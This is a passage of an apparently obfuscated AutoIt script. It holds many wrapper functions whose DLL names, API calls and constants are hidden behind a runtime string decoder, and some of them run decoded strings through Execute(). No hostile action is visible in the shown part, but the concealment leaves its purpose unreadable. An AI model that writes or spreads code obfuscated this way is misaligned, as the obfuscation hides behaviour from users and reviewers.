  2568.         Global $a1fc0111324 = a2b00005424($os[2376]), $a10c0215423 = a2b00005424($os[2377]), $a42c031035d = a2b00005424($os[2378]), $a02c0416134 = a2b00005424($os[2379]), $a1fc0511404 = a2b00005424($os[2380]), $a44c0612426 = a2b00005424($os[2381]), $a32c0712221 = a2b00005424($os[2382]), $a1fc0810241 = a2b00005424($os[2383]), $a0bc091280c = a2b00005424($os[2384]), $a23c0a12d53 = a2b00005424($os[2385]), $a2cc0b10f1e = a2b00005424($os[2386]), $a44c0c10a03 = a2b00005424($os[2387]), $a36c0d10a0e = a2b00005424($os[2388]), $a27c0e12331 = a2b00005424($os[2389])
  2569.         Global $ssa376010552e = 1
  2570.     EndIf
  2571.     Local $a60ffa04558 = Number($a0d80c10562)
  2572.     Local $a4fffe0303b = DllStructCreate($a61f8d0260a)
  2573.     Local $a03fff05b24[Number($a1080d14451)] = [Number($a5680e1542d)]
  2574.     Local $a5d8f00532a = $a103d00243d
  2575.     Local $a2300211508 = StringSplit($a60ff30390f, $a5880f15750)
  2576.     Local $a5d0041532a[$a2300211508[Number($a6190014c0f)] * Number($a3990113e63) + Number($a2e90214f49)]
  2577.     Local $a620081194b, $a2d0091152c, $a5e00a15749
  2578.     $a5d0041532a[Number($a3c90315405)] = $a2300211508[Number($a4990414020)] * Number($a3f90514e09)
  2579.     For $a3800e12616 = Number($a4790610d2f) To $a2300211508[Number($a4190712545)]
  2580.         $a620081194b = StringInStr($a2300211508[$a3800e12616], $a079081072b, Number($a5990910c06), Number($a1c90a1520a))
  2581.         $a2d0091152c = StringInStr($a2300211508[$a3800e12616], $a0890b15334, Number($a1090c11335), -Number($a5390d1014e))
  2582.         $a5d0041532a[$a3800e12616 * Number($a2390e10016) - Number($a3490f12516)] = StringStripWS(StringLeft($a2300211508[$a3800e12616], $a620081194b - Number($a06a0013422)), Number($a2da011180c))
  2583.         $a5d0041532a[$a3800e12616 * Number($a4ba0210f50)] = StringStripWS(StringTrimRight(StringTrimLeft($a2300211508[$a3800e12616], $a620081194b), StringLen($a2300211508[$a3800e12616]) - $a2d0091152c + Number($a5ea0313837)), Number($a2fa0414216))
  2584.         $a5e00a15749 &= $a01a0512f15 & StringLen($a5d0041532a[$a3800e12616 * Number($a4ba0612a14) - Number($a63a0711c5f)]) + Number($a2ea081035b) & $a37a0915608 & StringLen($a5d0041532a[$a3800e12616 * Number($a4ea0a15137)]) + Number($a3fa0b12b32) & $a02a0c1245a
  2585.     Next
  2586.     Local $a4320611c58 = DllStructCreate($a31a0d11e2d & StringLen($a04ff200620) + Number($a35a0e14347) & $a30a0f11d62)
  2587.     Local $a4420a16202 = DllStructCreate($a12b0010750 & StringLen($a0bff404a40) + Number($a4eb0110635) & $a01b0212042)
  2588.     Local $a4120e13b54 = DllStructCreate($a5e00a15749 & $a5fb031535a)
  2589.     Local $a1b30016162 = DllStructCreate($a3bb0414e5f & $a60ffa04558 & $a23b0515702)
  2590.     Local $a1430314e31 = DllStructCreate($a12b061100e & StringLen($a46ff601c57) + Number($a3fb0712838) & $a14b0811b5c)
  2591.     For $a3800e12616 = Number($a3cb0914b3c) To $a5d0041532a[Number($a4db0a12838)]
  2592.         DllStructSetData($a4120e13b54, $a3800e12616, $a5d0041532a[$a3800e12616])
  2593.     Next
  2594.     DllStructSetData($a4320611c58, $a31b0b14a34, $a04ff200620)
  2595.     DllStructSetData($a4420a16202, $a0bb0c15602, $a0bff404a40)
  2596.     DllStructSetData($a1b30016162, $a51b0d10436, $a21ff502e2e)
  2597.     DllStructSetData($a1430314e31, $a5cb0e10a63, $a46ff601c57)
  2598.     DllStructSetData($a4fffe0303b, $a55b0f13515, DllStructGetSize($a4fffe0303b))
  2599.     DllStructSetData($a4fffe0303b, $a27c001265c, $a26ff902411)
  2600.     DllStructSetData($a4fffe0303b, $a1fc0111324, DllStructGetPtr($a4120e13b54))
  2601.     DllStructSetData($a4fffe0303b, $a10c0215423, $a29ff701f57)
  2602.     DllStructSetData($a4fffe0303b, $a42c031035d, DllStructGetPtr($a1b30016162))
  2603.     DllStructSetData($a4fffe0303b, $a02c0416134, $a60ffa04558)
  2604.     DllStructSetData($a4fffe0303b, $a1fc0511404, DllStructGetPtr($a4420a16202))
  2605.     DllStructSetData($a4fffe0303b, $a44c0612426, DllStructGetPtr($a4320611c58))
  2606.     DllStructSetData($a4fffe0303b, $a32c0712221, $a5d8f00532a)
  2607.     DllStructSetData($a4fffe0303b, $a1fc0810241, DllStructGetPtr($a1430314e31))
  2608.     DllStructSetData($a4fffe0303b, $a0bc091280c, $a4cff802a2c)
  2609.     DllCall($a23c0a12d53, $a2cc0b10f1e, $a44c0c10a03, $a36c0d10a0e, $a4fffe0303b)
  2610.     If @error Then Return SetError(@error, @extended, $a03fff05b24)
  2611.     Return a5790403f1e(DllStructGetData($a1b30016162, $a27c0e12331))
  2612. EndFunc
  2613.  
  2614. Func a1760204b59($a44c0f1591d)
  2615.     If NOT IsDeclared("SSA1760204B59") Then
  2616.         Global $a5dd0014843 = a2b00005424($os[2390]), $a5cd0112b33 = a2b00005424($os[2391]), $a44d021522e = a2b00005424($os[2392]), $a47d0311e35 = a2b00005424($os[2393]), $a57d0412143 = a2b00005424($os[2394]), $a11d0513805 = a2b00005424($os[2395])
  2617.         Global $ssa1760204b59 = 1
  2618.     EndIf
  2619.     Local $a505a20190d = DllCall($a5dd0014843, $a5cd0112b33, $a44d021522e, $a47d0311e35, $a44c0f1591d)
  2620.     If @error Then Return SetError(@error, @extended, Number($a57d0412143))
  2621.     Return $a505a20190d[Number($a11d0513805)]
  2622. EndFunc
  2623.  
  2624. Func a3c60300a2f($a02d0613b13)
  2625.     If NOT IsDeclared("SSA3C60300A2F") Then
  2626.         Global $a38d0710545 = a2b00005424($os[2396]), $a10d0816049 = a2b00005424($os[2397]), $a22d0912a2b = a2b00005424($os[2398]), $a2cd0a15a10 = a2b00005424($os[2399]), $a0bd0b1373c = a2b00005424($os[2400]), $a0bd0d15f52 = a2b00005424($os[2401]), $a10d0e16062 = a2b00005424($os[2402]), $a43d0f15b0e = a2b00005424($os[2403]), $a14e0010333 = a2b00005424($os[2404]), $a09e011485c = a2b00005424($os[2405]), $a46e021471b = a2b00005424($os[2406]), $a4fe0311460 = a2b00005424($os[2407]), $a4de0414e3c = a2b00005424($os[2408]), $a0ee0512d32 = a2b00005424($os[2409]), $a47e0613f1a = a2b00005424($os[2410])
  2627.         Global $ssa3c60300a2f = 1
  2628.     EndIf
  2629.     If $a02d0613b13 < Number($a38d0710545) OR $a02d0613b13 > Number($a10d0816049) Then Return SetError(Number($a22d0912a2b), Number($a2cd0a15a10), -Number($a0bd0b1373c))
  2630.     Local Const $a19d0c11e62[Number($a0bd0d15f52)] = [-Number($a10d0e16062), -Number($a43d0f15b0e), -Number($a14e0010333)]
  2631.     Local $a505a20190d = DllCall($a09e011485c, $a46e021471b, $a4fe0311460, $a4de0414e3c, $a19d0c11e62[$a02d0613b13])
  2632.     If @error Then Return SetError(@error, @extended, -Number($a0ee0512d32))
  2633.     Return $a505a20190d[Number($a47e0613f1a)]
  2634. EndFunc
  2635.  
  2636. Func a1a6040160e($a577e20612b)
  2637.     If NOT IsDeclared("SSA1A6040160E") Then
  2638.         Global $a03e0711d12 = a2b00005424($os[2411]), $a4de081304c = a2b00005424($os[2412]), $a15e091285a = a2b00005424($os[2413]), $a15e0a12632 = a2b00005424($os[2414]), $a46e0b13c43 = a2b00005424($os[2415]), $a4de0c14a60 = a2b00005424($os[2416])
  2639.         Global $ssa1a6040160e = 1
  2640.     EndIf
  2641.     Local $a505a20190d = DllCall($a03e0711d12, $a4de081304c, $a15e091285a, $a15e0a12632, $a577e20612b)
  2642.     If @error Then Return SetError(@error, @extended, Number($a46e0b13c43))
  2643.     Return $a505a20190d[Number($a4de0c14a60)]
  2644. EndFunc
  2645.  
  2646. Func a2860503c0c($a577e20612b)
  2647.     If NOT IsDeclared("SSA2860503C0C") Then
  2648.         Global $a3ce0d12319 = a2b00005424($os[2417]), $a59e0e13363 = a2b00005424($os[2418]), $a50e0f13f4c = a2b00005424($os[2419]), $a18f0015c61 = a2b00005424($os[2420]), $a17f0112002 = a2b00005424($os[2421]), $a2af0214e4b = a2b00005424($os[2422])
  2649.         Global $ssa2860503c0c = 1
  2650.     EndIf
  2651.     Local $a505a20190d = DllCall($a3ce0d12319, $a59e0e13363, $a50e0f13f4c, $a18f0015c61, $a577e20612b)
  2652.     If @error Then Return SetError(@error, @extended, Number($a17f0112002))
  2653.     Return $a505a20190d[Number($a2af0214e4b)]
  2654. EndFunc
  2655.  
  2656. Func a0b60601921($a577e20612b)
  2657.     If NOT IsDeclared("SSA0B60601921") Then
  2658.         Global $a03f0313d46 = a2b00005424($os[2423]), $a43f0415152 = a2b00005424($os[2424]), $a5ff0515416 = a2b00005424($os[2425]), $a3bf0612255 = a2b00005424($os[2426]), $a1ff0711e26 = a2b00005424($os[2427]), $a28f081505a = a2b00005424($os[2428])
  2659.         Global $ssa0b60601921 = 1
  2660.     EndIf
  2661.     Local $a505a20190d = DllCall($a03f0313d46, $a43f0415152, $a5ff0515416, $a3bf0612255, $a577e20612b)
  2662.     If @error Then Return SetError(@error, @extended, Number($a1ff0711e26))
  2663.     Return $a505a20190d[Number($a28f081505a)]
  2664. EndFunc
  2665.  
  2666. Func a3560700e2a($a32ac505260, $a09fd400f0d)
  2667.     If NOT IsDeclared("SSA3560700E2A") Then
  2668.         Global $a13f0a15d5b = a2b00005424($os[2429]), $a4ef0b15c38 = a2b00005424($os[2430]), $a53f0c12f15 = a2b00005424($os[2431]), $a3df0d14118 = a2b00005424($os[2432]), $a19f0e1232f = a2b00005424($os[2433]), $a4ff0f10527 = a2b00005424($os[2434]), $a3a01014555 = a2b00005424($os[2435]), $a1401110235 = a2b00005424($os[2436])
  2669.         Global $ssa3560700e2a = 1
  2670.     EndIf
  2671.     Local $a5df0910647 = DllStructCreate($a5b3800405b)
  2672.     Local $a11de601b14 = StringLen($a09fd400f0d)
  2673.     DllCall($a13f0a15d5b, $a4ef0b15c38, $a53f0c12f15, $a3df0d14118, $a32ac505260, $a19f0e1232f, $a09fd400f0d, $a4ff0f10527, $a11de601b14, $a3a01014555, $a5df0910647)
  2674.     If @error Then Return SetError(@error, @extended, Number($a1401110235))
  2675.     Return $a5df0910647
  2676. EndFunc
  2677.  
  2678. Func a296080345c($a32ac505260)
  2679.     If NOT IsDeclared("SSA296080345C") Then
  2680.         Global $a1101412421 = a2b00005424($os[2437]), $a5f01511638 = a2b00005424($os[2438]), $a320161522d = a2b00005424($os[2439]), $a4301714e63 = a2b00005424($os[2440]), $a5301811101 = a2b00005424($os[2441]), $a1701914821 = a2b00005424($os[2442]), $a4001a15415 = a2b00005424($os[2443]), $a3e01b15b25 = a2b00005424($os[2444]), $a4c01c13949 = a2b00005424($os[2445]), $a6201d10816 = a2b00005424($os[2446])
  2681.         Global $ssa296080345c = 1
  2682.     EndIf
  2683.     Local $a5c01213b0a = DllStructCreate($a3d29204854)
  2684.     Local $a430131125a = DllCall($a1101412421, $a5f01511638, $a320161522d, $a4301714e63, $a32ac505260, $a5301811101, $a5c01213b0a)
  2685.     If @error Then Return SetError(@error, @extended, Number($a1701914821))
  2686.     If NOT $a430131125a[Number($a4001a15415)] Then Return SetError(-Number($a3e01b15b25), Number($a4c01c13949), Number($a6201d10816))
  2687.     Return $a5c01213b0a
  2688. EndFunc
  2689.  
  2690. Func a466090092d($a3eca000d54, $a0f01e10305)
  2691.     If NOT IsDeclared("SSA466090092D") Then
  2692.         Global $a5701f12427 = a2b00005424($os[2447]), $a3011011b02 = a2b00005424($os[2448]), $a1311110c51 = a2b00005424($os[2449]), $a3b11213740 = a2b00005424($os[2450]), $a1d11315a33 = a2b00005424($os[2451]), $a4311411d0f = a2b00005424($os[2452]), $a5311512c09 = a2b00005424($os[2453])
  2693.         Global $ssa466090092d = 1
  2694.     EndIf
  2695.     Local $a505a20190d = DllCall($a5701f12427, $a3011011b02, $a1311110c51, $a3b11213740, $a3eca000d54, $a1d11315a33, $a0f01e10305)
  2696.     If @error Then Return SetError(@error, @extended, Number($a4311411d0f))
  2697.     Return $a505a20190d[Number($a5311512c09)]
  2698. EndFunc
  2699.  
  2700. Func a2c60a0263a($a3eca000d54)
  2701.     If NOT IsDeclared("SSA2C60A0263A") Then
  2702.         Global $a1a11610f05 = a2b00005424($os[2454]), $a2211714d0b = a2b00005424($os[2455]), $a1a11813f3d = a2b00005424($os[2456]), $a4a1191384c = a2b00005424($os[2457]), $a5f11a10a2d = a2b00005424($os[2458]), $a0c11b12c38 = a2b00005424($os[2459])
  2703.         Global $ssa2c60a0263a = 1
  2704.     EndIf
  2705.     Local $a505a20190d = DllCall($a1a11610f05, $a2211714d0b, $a1a11813f3d, $a4a1191384c, $a3eca000d54)
  2706.     If @error Then Return SetError(@error, @extended, Number($a5f11a10a2d))
  2707.     Return $a505a20190d[Number($a0c11b12c38)]
  2708. EndFunc
  2709.  
  2710. Func a4460b06359($a3eca000d54)
  2711.     If NOT IsDeclared("SSA4460B06359") Then
  2712.         Global $a1411c14436 = a2b00005424($os[2460]), $a1311d14f12 = a2b00005424($os[2461]), $a3f11e12213 = a2b00005424($os[2462])
  2713.         Global $ssa4460b06359 = 1
  2714.     EndIf
  2715.     Local $a2f6de02137 = a1a60e02127($a3eca000d54)
  2716.     If @error Then Return SetError(@error, @extended, Number($a1411c14436))
  2717.     Return DllStructGetData($a2f6de02137, $a1311d14f12) - DllStructGetData($a2f6de02137, $a3f11e12213)
  2718. EndFunc
  2719.  
  2720. Func a1660c04243($a3eca000d54, $a577e20612b)
  2721.     If NOT IsDeclared("SSA1660C04243") Then
  2722.         Global $a1c2101224e = a2b00005424($os[2463]), $a042111510a = a2b00005424($os[2464]), $a0b21215216 = a2b00005424($os[2465]), $a4021313a45 = a2b00005424($os[2466]), $a6121414c55 = a2b00005424($os[2467]), $a6121510703 = a2b00005424($os[2468]), $a5121614e17 = a2b00005424($os[2469]), $a0721713425 = a2b00005424($os[2470]), $a5f21811932 = a2b00005424($os[2471])
  2723.         Global $ssa1660c04243 = 1
  2724.     EndIf
  2725.     Local $a5e11f13f2a = $a1c2101224e
  2726.     If Execute($a042111510a) Then $a5e11f13f2a = $a0b21215216
  2727.     Local $a505a20190d = DllCall($a4021313a45, $a6121414c55, $a5e11f13f2a, $a6121510703, $a3eca000d54, $a5121614e17, $a577e20612b)
  2728.     If @error Then Return SetError(@error, @extended, Number($a0721713425))
  2729.     Return $a505a20190d[Number($a5f21811932)]
  2730. EndFunc
  2731.  
  2732. Func a0060d04506($a3eca000d54)
  2733.     If NOT IsDeclared("SSA0060D04506") Then
  2734.         Global $a3121a12a57 = a2b00005424($os[2472]), $a0c21b15c55 = a2b00005424($os[2473]), $a2221c1052e = a2b00005424($os[2474]), $a4421d13b41 = a2b00005424($os[2475]), $a0621e10847 = a2b00005424($os[2476]), $a3421f12f31 = a2b00005424($os[2477]), $a2331011031 = a2b00005424($os[2478])
  2735.         Global $ssa0060d04506 = 1
  2736.     EndIf
  2737.     Local $a4b21910316 = DllStructCreate($a4909900e0c)
  2738.     DllStructSetData($a4b21910316, $a3121a12a57, DllStructGetSize($a4b21910316))
  2739.     DllCall($a0c21b15c55, $a2221c1052e, $a4421d13b41, $a0621e10847, $a3eca000d54, $a3421f12f31, $a4b21910316)
  2740.     If @error Then Return SetError(@error, @extended, Number($a2331011031))
  2741.     Return $a4b21910316
  2742. EndFunc
  2743.  
  2744. Func a1a60e02127($a3eca000d54)
  2745.     If NOT IsDeclared("SSA1A60E02127") Then
  2746.         Global $a6131115a40 = a2b00005424($os[2479]), $a1e31214141 = a2b00005424($os[2480]), $a2e31312512 = a2b00005424($os[2481]), $a0d3141354f = a2b00005424($os[2482]), $a4e3151584b = a2b00005424($os[2483]), $a3e31613539 = a2b00005424($os[2484])
  2747.         Global $ssa1a60e02127 = 1
  2748.     EndIf
  2749.     Local $a2f6de02137 = DllStructCreate($a2a28e05730)
  2750.     DllCall($a6131115a40, $a1e31214141, $a2e31312512, $a0d3141354f, $a3eca000d54, $a4e3151584b, $a2f6de02137)
  2751.     If @error Then Return SetError(@error, @extended, Number($a3e31613539))
  2752.     Return $a2f6de02137
  2753. EndFunc
  2754.  
  2755. Func a0560f05604($a3eca000d54, $a1231714c22)
  2756.     If NOT IsDeclared("SSA0560F05604") Then
  2757.         Global $a2d31816315 = a2b00005424($os[2485]), $a5e31912d13 = a2b00005424($os[2486]), $a2631a13708 = a2b00005424($os[2487]), $a4631b11323 = a2b00005424($os[2488]), $a5831c1244c = a2b00005424($os[2489]), $a1331d15e4d = a2b00005424($os[2490]), $a1931e15935 = a2b00005424($os[2491])
  2758.         Global $ssa0560f05604 = 1
  2759.     EndIf
  2760.     Local $a505a20190d = DllCall($a2d31816315, $a5e31912d13, $a2631a13708, $a4631b11323, $a3eca000d54, $a5831c1244c, $a1231714c22)
  2761.     If @error Then Return SetError(@error, @extended, Number($a1331d15e4d))
  2762.     Return $a505a20190d[Number($a1931e15935)]
  2763. EndFunc
  2764.  
  2765. Func a3e70003210($a3eca000d54)
  2766.     If NOT IsDeclared("SSA3E70003210") Then
  2767.         Global $a3e31f11b12 = a2b00005424($os[2492]), $a1141010711 = a2b00005424($os[2493]), $a244111072c = a2b00005424($os[2494]), $a5e41215a47 = a2b00005424($os[2495]), $a344131332c = a2b00005424($os[2496]), $a124141493d = a2b00005424($os[2497]), $a3341515e3d = a2b00005424($os[2498]), $a5341614a12 = a2b00005424($os[2499]), $a4041715e60 = a2b00005424($os[2500])
  2768.         Global $ssa3e70003210 = 1
  2769.     EndIf
  2770.     Local $a505a20190d = DllCall($a3e31f11b12, $a1141010711, $a244111072c, $a5e41215a47, $a3eca000d54, $a344131332c, "", $a124141493d, Number($a3341515e3d))
  2771.     If @error Then Return SetError(@error, @extended, "")
  2772.     Return SetExtended($a505a20190d[Number($a5341614a12)], $a505a20190d[Number($a4041715e60)])
  2773. EndFunc
  2774.  
  2775. Func a3e70101416($a3eca000d54, ByRef $a3441813a38)
  2776.     If NOT IsDeclared("SSA3E70101416") Then
  2777.         Global $a2241911c16 = a2b00005424($os[2501]), $a4f41a12b04 = a2b00005424($os[2502]), $a5f41b13546 = a2b00005424($os[2503]), $a0041c11354 = a2b00005424($os[2504]), $a1a41d10d03 = a2b00005424($os[2505]), $a4141e1235b = a2b00005424($os[2506]), $a0e41f13801 = a2b00005424($os[2507]), $a1251011846 = a2b00005424($os[2508]), $a4f5111491b = a2b00005424($os[2509])
  2778.         Global $ssa3e70101416 = 1
  2779.     EndIf
  2780.     Local $a505a20190d = DllCall($a2241911c16, $a4f41a12b04, $a5f41b13546, $a0041c11354, $a3eca000d54, $a1a41d10d03, Number($a4141e1235b))
  2781.     If @error Then Return SetError(@error, @extended, Number($a0e41f13801))
  2782.     $a3441813a38 = $a505a20190d[Number($a1251011846)]
  2783.     Return $a505a20190d[Number($a4f5111491b)]
  2784. EndFunc
  2785.  
  2786. Func a2970200553($a3eca000d54)
  2787.     If NOT IsDeclared("SSA2970200553") Then
  2788.         Global $a0e51212b51 = a2b00005424($os[2510]), $a3351314f63 = a2b00005424($os[2511]), $a4051411246 = a2b00005424($os[2512])
  2789.         Global $ssa2970200553 = 1
  2790.     EndIf
  2791.     Local $a2f6de02137 = a1a60e02127($a3eca000d54)
  2792.     If @error Then Return SetError(@error, @extended, Number($a0e51212b51))
  2793.     Return DllStructGetData($a2f6de02137, $a3351314f63) - DllStructGetData($a2f6de02137, $a4051411246)
  2794. EndFunc
  2795.  
  2796. Func a507030094e(ByRef $a4d1c401e56, ByRef $a3f8d803d27, ByRef $a568d905c12)
  2797.     If NOT IsDeclared("SSA507030094E") Then
  2798.         Global $a5c51511233 = a2b00005424($os[2513]), $a555161011c = a2b00005424($os[2514])
  2799.         Global $ssa507030094e = 1
  2800.     EndIf
  2801.     $a3f8d803d27 = DllStructGetData($a4d1c401e56, $a5c51511233)
  2802.     $a568d905c12 = DllStructGetData($a4d1c401e56, $a555161011c)
  2803. EndFunc
  2804.  
  2805. Func a3170403c57()
  2806.     If NOT IsDeclared("SSA3170403C57") Then
  2807.         Global $a3551915b5f = a2b00005424($os[2515]), $a3651a1060d = a2b00005424($os[2516]), $a3151b12d3f = a2b00005424($os[2517]), $a1a51c1200d = a2b00005424($os[2518]), $a4751d1271f = a2b00005424($os[2519]), $a4451e10b5c = a2b00005424($os[2520]), $a1661012527 = a2b00005424($os[2521]), $a0f61114e10 = a2b00005424($os[2522]), $a056121005e = a2b00005424($os[2523]), $a126131092a = a2b00005424($os[2524]), $a0461413b07 = a2b00005424($os[2525]), $a5861510357 = a2b00005424($os[2526]), $a0d6161080a = a2b00005424($os[2527]), $a2661711525 = a2b00005424($os[2528]), $a3861811b07 = a2b00005424($os[2529]), $a5c61915800 = a2b00005424($os[2530]), $a1561a1064e = a2b00005424($os[2531]), $a5461b11259 = a2b00005424($os[2532]), $a4a61c10322 = a2b00005424($os[2533]), $a5161d14705 = a2b00005424($os[2534]), $a1f61e13822 = a2b00005424($os[2535])
  2808.         Global $ssa3170403c57 = 1
  2809.     EndIf
  2810.     Local $a4351713558 = DllStructCreate($a37cbb02f15)
  2811.     Local $a5b51814f42 = DllStructGetSize($a4351713558)
  2812.     DllStructSetData($a4351713558, Number($a3551915b5f), $a5b51814f42)
  2813.     DllCall($a3651a1060d, $a3151b12d3f, $a1a51c1200d, $a4751d1271f, $a4351713558)
  2814.     If @error Then Return SetError(@error, @extended, Number($a4451e10b5c))
  2815.     Local $a2151f11946[Number($a1661012527)]
  2816.     $a2151f11946[Number($a0f61114e10)] = DllStructGetData($a4351713558, Number($a056121005e))
  2817.     $a2151f11946[Number($a126131092a)] = DllStructGetData($a4351713558, Number($a0461413b07))
  2818.     $a2151f11946[Number($a5861510357)] = DllStructGetData($a4351713558, Number($a0d6161080a))
  2819.     $a2151f11946[Number($a2661711525)] = DllStructGetData($a4351713558, Number($a3861811b07))
  2820.     $a2151f11946[Number($a5c61915800)] = DllStructGetData($a4351713558, Number($a1561a1064e))
  2821.     $a2151f11946[Number($a5461b11259)] = DllStructGetData($a4351713558, Number($a4a61c10322))
  2822.     $a2151f11946[Number($a5161d14705)] = DllStructGetData($a4351713558, Number($a1f61e13822))
  2823.     Return $a2151f11946
  2824. EndFunc
  2825.  
  2826. Func a367050294e($a4861f15e04)
  2827.     If NOT IsDeclared("SSA367050294E") Then
  2828.         Global $a5e7111050e = a2b00005424($os[2536])
  2829.         Global $ssa367050294e = 1
  2830.     EndIf
  2831.     Local $a157101472d = DllStructCreate($a3509701e53)
  2832.     a1e70601602($a4861f15e04, $a157101472d)
  2833.     If @error Then Return SetError(@error, @extended, Number($a5e7111050e))
  2834.     Return $a157101472d
  2835. EndFunc
  2836.  
  2837. Func a1e70601602($a4861f15e04, $a5771214535)
  2838.     If NOT IsDeclared("SSA1E70601602") Then
  2839.         Global $a0e71313b5d = a2b00005424($os[2537]), $a5571412e06 = a2b00005424($os[2538]), $a5e71515f40 = a2b00005424($os[2539]), $a1371612a37 = a2b00005424($os[2540]), $a397171514d = a2b00005424($os[2541]), $a0671813a5f = a2b00005424($os[2542])
  2840.         Global $ssa1e70601602 = 1
  2841.     EndIf
  2842.     Local $a505a20190d = DllCall($a0e71313b5d, $a5571412e06, $a5e71515f40, $a1371612a37, $a4861f15e04, $a397171514d, $a5771214535)
  2843.     If @error Then Return SetError(@error, @extended, False)
  2844.     Return $a505a20190d[Number($a0671813a5f)]
  2845. EndFunc
  2846.  
  2847. Func a2b70704729($a5471911552)
  2848.     If NOT IsDeclared("SSA2B70704729") Then
  2849.         Global $a2771a14654 = a2b00005424($os[2543])
  2850.         Global $ssa2b70704729 = 1
  2851.     EndIf
  2852.     Return BitShift($a5471911552, Number($a2771a14654))
  2853. EndFunc
  2854.  
  2855. Func a1f70804454($a3eca000d54, ByRef $a2971b14303)
  2856.     If NOT IsDeclared("SSA1F70804454") Then
  2857.         Global $a6171d13846 = a2b00005424($os[2544]), $a3171e1565a = a2b00005424($os[2545]), $a1371f10603 = a2b00005424($os[2546]), $a0781011c05 = a2b00005424($os[2547]), $a4381115861 = a2b00005424($os[2548]), $a2e81215725 = a2b00005424($os[2549]), $a5281313d11 = a2b00005424($os[2550]), $a5481414e14 = a2b00005424($os[2551]), $a1581513e54 = a2b00005424($os[2552]), $a3a81614a49 = a2b00005424($os[2553]), $a4f81711d45 = a2b00005424($os[2554]), $a0a81813443 = a2b00005424($os[2555]), $a4981915a0f = a2b00005424($os[2556]), $a0481a13739 = a2b00005424($os[2557]), $a4a81b16345 = a2b00005424($os[2558]), $a5481c13c62 = a2b00005424($os[2559]), $a0681d13740 = a2b00005424($os[2560])
  2858.         Global $ssa1f70804454 = 1
  2859.     EndIf
  2860.     If $a3eca000d54 = $a2971b14303 Then Return True
  2861.     For $a0371c12022 = $a38da400343[Number($a6171d13846)][Number($a3171e1565a)] To Number($a1371f10603) Step -Number($a0781011c05)
  2862.         If $a3eca000d54 = $a38da400343[$a0371c12022][Number($a4381115861)] Then
  2863.             If $a38da400343[$a0371c12022][Number($a2e81215725)] Then
  2864.                 $a2971b14303 = $a3eca000d54
  2865.                 Return True
  2866.             Else
  2867.                 Return False
  2868.             EndIf
  2869.         EndIf
  2870.     Next
  2871.     Local $a62cbf0122a
  2872.     a3e70101416($a3eca000d54, $a62cbf0122a)
  2873.     Local $a0a4ed03152 = $a38da400343[Number($a5281313d11)][Number($a5481414e14)] + Number($a1581513e54)
  2874.     If $a0a4ed03152 >= Number($a3a81614a49) Then $a0a4ed03152 = Number($a4f81711d45)
  2875.     $a38da400343[Number($a0a81813443)][Number($a4981915a0f)] = $a0a4ed03152
  2876.     $a38da400343[$a0a4ed03152][Number($a0481a13739)] = $a3eca000d54
  2877.     $a38da400343[$a0a4ed03152][Number($a4a81b16345)] = ($a62cbf0122a = Execute($a5481c13c62))
  2878.     Return $a38da400343[$a0a4ed03152][Number($a0681d13740)]
  2879. EndFunc
  2880.  
  2881. Func a0770903020($a6181e13141)
  2882.     If NOT IsDeclared("SSA0770903020") Then
  2883.         Global $a1981f15317 = a2b00005424($os[2561]), $a4591014410 = a2b00005424($os[2562]), $a0f9111143b = a2b00005424($os[2563]), $a2991213022 = a2b00005424($os[2564])
  2884.         Global $ssa0770903020 = 1
  2885.     EndIf
  2886.     Local $a35ce806013 = DllStructCreate($a1981f15317)
  2887.     Local $a0dce601052 = DllStructCreate($a4591014410, DllStructGetPtr($a35ce806013))
  2888.     DllStructSetData($a35ce806013, Number($a0f9111143b), $a6181e13141)
  2889.     Return DllStructGetData($a0dce601052, Number($a2991213022))
  2890. EndFunc
  2891.  
  2892. Func a1f70a00403($a3eca000d54, $a3d9ee0341e)
  2893.     If NOT IsDeclared("SSA1F70A00403") Then
  2894.         Global $a0091412c30 = a2b00005424($os[2565]), $a2291713b15 = a2b00005424($os[2566]), $a4591811f57 = a2b00005424($os[2567]), $a399191280f = a2b00005424($os[2568])
  2895.         Global $ssa1f70a00403 = 1
  2896.     EndIf
  2897.     Local $a2f9131520e = Opt($a0091412c30)
  2898.     Local $a0791510a50 = StringSplit($a3d9ee0341e, $a2f9131520e)
  2899.     If NOT IsHWnd($a3eca000d54) Then $a3eca000d54 = GUICtrlGetHandle($a3eca000d54)
  2900.     Local $a2a91613613 = a0140201854($a3eca000d54)
  2901.     For $a3040c14f22 = Number($a2291713b15) To UBound($a0791510a50) - Number($a4591811f57)
  2902.         If StringUpper(StringMid($a2a91613613, Number($a399191280f), StringLen($a0791510a50[$a3040c14f22]))) = StringUpper($a0791510a50[$a3040c14f22]) Then Return True
  2903.     Next
  2904.     Return False
  2905. EndFunc
  2906.  
  2907. Func a1a70b05536($a3eca000d54)
  2908.     If NOT IsDeclared("SSA1A70B05536") Then
  2909.         Global $a1d91a1290b = a2b00005424($os[2569]), $a1891b1524c = a2b00005424($os[2570]), $a3f91c15455 = a2b00005424($os[2571]), $a4791d1531c = a2b00005424($os[2572]), $a4691e1025a = a2b00005424($os[2573]), $a1991f16003 = a2b00005424($os[2574])
  2910.         Global $ssa1a70b05536 = 1
  2911.     EndIf
  2912.     Local $a505a20190d = DllCall($a1d91a1290b, $a1891b1524c, $a3f91c15455, $a4791d1531c, $a3eca000d54)
  2913.     If @error Then Return SetError(@error, @extended, Number($a4691e1025a))
  2914.     Return $a505a20190d[Number($a1991f16003)]
  2915. EndFunc
  2916.  
  2917. Func a5370c01246($a3eca000d54)
  2918.     If NOT IsDeclared("SSA5370C01246") Then
  2919.         Global $a18a1010f05 = a2b00005424($os[2575]), $a20a1114043 = a2b00005424($os[2576]), $a1ea121231d = a2b00005424($os[2577]), $a1ea1310e03 = a2b00005424($os[2578]), $a4fa1412e62 = a2b00005424($os[2579]), $a48a1511c2f = a2b00005424($os[2580])
  2920.         Global $ssa5370c01246 = 1
  2921.     EndIf
  2922.     Local $a505a20190d = DllCall($a18a1010f05, $a20a1114043, $a1ea121231d, $a1ea1310e03, $a3eca000d54)
  2923.     If @error Then Return SetError(@error, @extended, Number($a4fa1412e62))
  2924.     Return $a505a20190d[Number($a48a1511c2f)]
  2925. EndFunc
  2926.  
  2927. Func a0d70d0171d($a3eca000d54, $a2f6de02137 = 0, $a4ba161192e = True)
  2928.     If NOT IsDeclared("SSA0D70D0171D") Then
  2929.         Global $a5aa171082f = a2b00005424($os[2581]), $a07a1811e3e = a2b00005424($os[2582]), $a11a191611e = a2b00005424($os[2583]), $a56a1a12e26 = a2b00005424($os[2584]), $a30a1b1404d = a2b00005424($os[2585]), $a28a1c1114c = a2b00005424($os[2586]), $a0ca1d1294e = a2b00005424($os[2587])
